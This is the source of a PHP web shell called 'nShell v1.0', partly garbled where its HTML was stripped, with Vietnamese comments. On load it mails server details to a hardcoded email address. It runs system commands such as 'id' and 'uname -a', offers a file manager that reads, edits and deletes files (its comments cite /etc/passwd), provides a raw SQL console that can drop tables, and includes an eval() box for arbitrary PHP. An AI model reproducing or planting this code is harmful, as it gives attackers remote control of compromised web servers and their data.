?? nShell v1.0
System information: :
"; $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); ?> "; foreach ($arr as $filename) { if ($filename != "." and $filename != ".."){ if (is_dir($filename) == true){ $directory = ""; $dc=str_replace("\\","",dirname($_SERVER['PHP_SELF'])); $directory = $directory . ""; $dires = $dires . $directory; } if (is_file($filename) == true){ $file = ""; $link=str_replace(basename($_SERVER['REDIRECT_URL']),$filename,$_SERVER['REDIRECT_URL']); $file = $file . ""; $files = $files . $file; } } } echo $dires; echo $files; echo "
Safe_mode: ON"):("Safe_mode: OFF")); echo " "; // phpversion echo "Php version : ".@phpversion().""; echo " "; // curl $curl_on = @function_exists('curl_version'); echo "cURL: ".(($curl_on)?("ON"):("OFF")); echo " "; // mysql echo "MYSQL: "; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){echo "ON";}else{echo "OFF";} echo " "; // msssql echo "MSSQL: "; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "ON";}else{echo "OFF";} echo " "; // PostgreSQL echo "PostgreSQL: "; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "ON";}else{echo "OFF";} echo " "; // Oracle echo "Oracle: "; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "ON";}else{echo "OFF";} echo "
"; echo " "; // Disable function echo "Disable functions : "; $df=@ini_get('disable_functions'); if(!$df){echo "NONE";}else{echo "$df";} echo " "; //==============xac dinh os================== $servsoft = $_SERVER['SERVER_SOFTWARE']; if (ereg("Win32", $servsoft)){ $sertype = "win"; } else { $sertype = "nix"; } //========================================= $uname=ex('uname -a'); echo "
OS: "; if (empty($uname)){ echo (php_uname()."
"); }else echo $uname."
"; $id = ex('id'); $server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']; echo "SERVER: ".$server."
"; echo "id: "; if (!empty($id)){ echo $id."
"; }else echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid(). "
"; echo "Php Info
"; ?>
File Manager Sql Query Eval()
Php Version :".phpversion().""; phpinfo(); echo ""; } ?>
NameTypeSizePermsDelete
$filename" .ucwords(filetype($filename)) . "" . perms(fileperms($filename))."Del
$filename" .ucwords(filetype($filename)). "" . filesize($filename) . "" . perms(fileperms($filename))."Del Edit

"; } // view file ex: /etc/passwd if(isset($_REQUEST['file'])) { $file=@$_REQUEST["file"]; echo "File : ". $file.""; $fp=fopen($file,"r+") or die("Ban khong co quyen de ghi vao File nay , hoac do khong tim thay File"); $src=@fread($fp,filesize($file)); echo "



"; $addtxt=@$_POST["addtxt"]; rewind($fp); if($addtxt=="") @fwrite($fp,stripslashes($src)); else $rs=@fwrite($fp,stripslashes($addtxt)); if($rs==true) { echo "Noi dung cua file nay da duoc sua doi !Xem lai"; } ftruncate($fp,ftell($fp)); echo "
"; } ?> Query # ".$query."
"; $result=@mysql_query($query) or die("Khong update du lieu duoc !"); if(mysql_affected_rows($result)>=0) echo "Affected rows : ".mysql_affected_rows($result)."This is Ok ! ^.^
"; } function exe_c($query) { echo "Query # ".$query."
"; $result=@mysql_query($query) or die("Khong Create duoc !"); echo "This is Ok ! ^.^
" ; } function exe_d($query) { echo "Query # ".$query."
"; $result=@mysql_query($query) or die("Khong Drop duoc !"); echo "This is Ok ! ^.^
" ; } function exe_w($query) { echo "Query # ".$query."
"; $result=@mysql_query($query) or die("Khong the show gi duoc het !"); if(eregi("fields",$query)) { while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){ echo "".$row['Field']." : ".$row['Type']; echo "
"; } } else { while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){ while(list($key,$value)=each($row)) { echo "".$value.""; } echo "
"; } } } function exe_s($query) { $arrstr=@array();$i=0; $arrstr=explode(" ",$query); $find_field=@mysql_query("show fiedls from ".$arrstr['4']); while($find_row=@mysql_fetch_array($find_field,MYSQL_ASSOC)){ $i++; $arrstr[$i]=$find_row['Field']; } echo "Query # ".$query."
"; $result=@mysql_query($query) or die("Khong the select gi duoc het !"); $row=@mysql_num_rows($result); } function sql($string) { $arr=@array(); $arr=explode(";",$string); for($i=0;$i<=count($arr);$i++) { $check_u=eregi("update",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]); $check_e=eregi("use",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]); $check_c=eregi("create",@$arr[$i]); if($check_c==true) exe_c(@$arr[$i]); $check_d=eregi("drop",@$arr[$i]); if($check_d==true) exe_d(@$arr[$i]); $check_w=eregi("show",@$arr[$i]); if($check_w==true) exe_w(@$arr[$i]); $check_s=eregi("select",@$arr[$i]); if($check_s==true) exe_s(@$arr[$i]); } } //=====xong phan function cho sql // Sql query if($act=="sql") { if(isset($_GET['srname'])&&isset($_GET['pass'])) { echo $_GET['srname']; if(!isset($_GET['srname'])) $servername=$_GET['srname']; else $servername="localhost"; $con=@mysql_connect($servername,$_GET['uname'],$_GET['pass']) or die("Khong the connect duoc !"); $form2="

"; echo $form2; $str=@$_POST['str']; if(isset($str)) sql($str); } else { echo "chao"; $form1="
User Name : Server Name :
Password : Port :

"; echo $form1; } } ?>

"; }else{ eval($script); } } ?> !nShell v1.0. Code by Navaro.
Have Fun ! {^.^} { ~.~}